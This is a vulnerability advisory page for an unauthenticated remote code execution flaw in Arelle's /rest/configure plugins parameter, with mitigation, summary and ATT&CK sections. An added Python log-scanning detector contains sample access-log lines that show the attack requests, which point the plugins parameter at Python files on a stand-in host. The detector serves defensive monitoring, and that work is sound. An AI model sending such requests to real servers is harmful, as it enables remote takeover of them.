Cyber Posture

CVE-2026-42796

Severity: Critical · Public PoC available

Published: 04 May 2026
Modified: 05 May 2026
KEV Added:
Patch:
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0028 (51.1st percentile)
Risk Priority: 20 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Description

Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint, which accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.

Mitigating Controls (NIST 800-53 r5) (AI-generated)

Prevent: Directly mitigates the vulnerability by prohibiting unauthenticated access to critical functions such as the /rest/configure endpoint's plugins parameter, which enables remote code execution.

Prevent: Enforces security requirements on publicly accessible web endpoints such as /rest/configure to prevent unauthorized remote code execution via unauthenticated requests.

Prevent: Enforces approved authorizations to block unauthenticated access to the plugin manager through the vulnerable REST endpoint.

Security Summary (AI-generated)

CVE-2026-42796 is an unauthenticated remote code execution vulnerability affecting Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and passes it directly to the plugin manager without any authentication or authorization checks. By supplying a URL pointing to a malicious Python file via this parameter, an attacker can cause the Arelle webserver to download and execute the attacker-controlled code within the Arelle process, running with its existing privileges. The vulnerability is rated with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and is associated with CWE-306 (Missing Authentication for Critical Function).

Any unauthenticated remote attacker with network access to the Arelle webserver can exploit this vulnerability by crafting an HTTP request to the /rest/configure endpoint with a malicious plugins parameter. Successful exploitation leads to arbitrary code execution on the server, potentially allowing full compromise of the Arelle process, including high confidentiality, integrity, and availability impacts as reflected in the CVSS vector.

Mitigation is available by upgrading to Arelle version 2.39.10 or later, as detailed in the project's release notes. The fixing pull request (#2320) on the Arelle GitHub repository addresses the lack of authentication by implementing proper checks in the plugin manager. Additional details on the vulnerability and its exploitation are provided in the VulnCheck advisory.
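As an added detection example (not part of this record and not Arelle's own code), the following Python scans web-server access-log lines for requests that hand /rest/configure a plugins value carrying a URL scheme, which is the remote-download path described above; the log lines are constructed, and the '|' separator for multiple plugins is assumed from Arelle's command-line convention.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2026:10:12:01 +0000] "GET /rest/configure?plugins=http://203.0.113.7/x.py HTTP/1.1" 200 512
10.0.0.8 - - [04/May/2026:10:12:05 +0000] "GET /rest/configure?plugins=validate/EFM HTTP/1.1" 200 120
10.0.0.9 - - [04/May/2026:10:13:20 +0000] "GET /rest/xbrl/validation?file=report.xbrl HTTP/1.1" 200 9001
10.0.0.5 - - [04/May/2026:10:14:44 +0000] "GET /rest/configure?plugins=https%3A%2F%2F203.0.113.7%2Fy.py HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A plugins value with a URL scheme points the plugin manager at a remote file.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
# Assumption: multiple plugins are separated by '|', as on the Arelle command line.
PLUGIN_SEP = "|"


def suspicious_configure_requests(log_text):
    """Return (src, ts, plugin_value) for /rest/configure requests whose
    plugins parameter names a remote URL rather than a local plugin."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        target = urlsplit(m.group("target"))
        if target.path.rstrip("/") != "/rest/configure":
            continue
        # parse_qs percent-decodes values, so an encoded https%3A%2F%2F is still seen.
        for value in parse_qs(target.query).get("plugins", []):
            for plugin in value.split(PLUGIN_SEP):
                plugin = plugin.strip()
                if REMOTE_RE.match(plugin):
                    hits.append((m.group("src"), m.group("ts"), plugin))
    return hits


if __name__ == "__main__":
    for src, ts, plugin in suspicious_configure_requests(SAMPLE_LOG):
        print(f"{ts} {src} requested remote plugin {plugin}")
```

Local plugin names such as validate/EFM are left alone, so the rule keys on the remote-fetch behaviour rather than on any use of the endpoint.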

Details

CWE(s): CWE-306 (Missing Authentication for Critical Function)

MITRE ATT&CK Enterprise Techniques (AI-generated)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.006 Python (Execution)
Adversaries may abuse Python commands and scripts for execution.
T1105 Ingress Tool Transfer (Command and Control)
Adversaries may transfer tools or other files from an external system into a compromised environment.
Why these techniques?

Unauthenticated RCE in the public /rest/configure endpoint enables T1190 (Exploit Public-Facing Application). The attacker-supplied URL causes a server-side download (T1105 Ingress Tool Transfer) followed by Python execution (T1059.006) with the Arelle process's privileges.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

References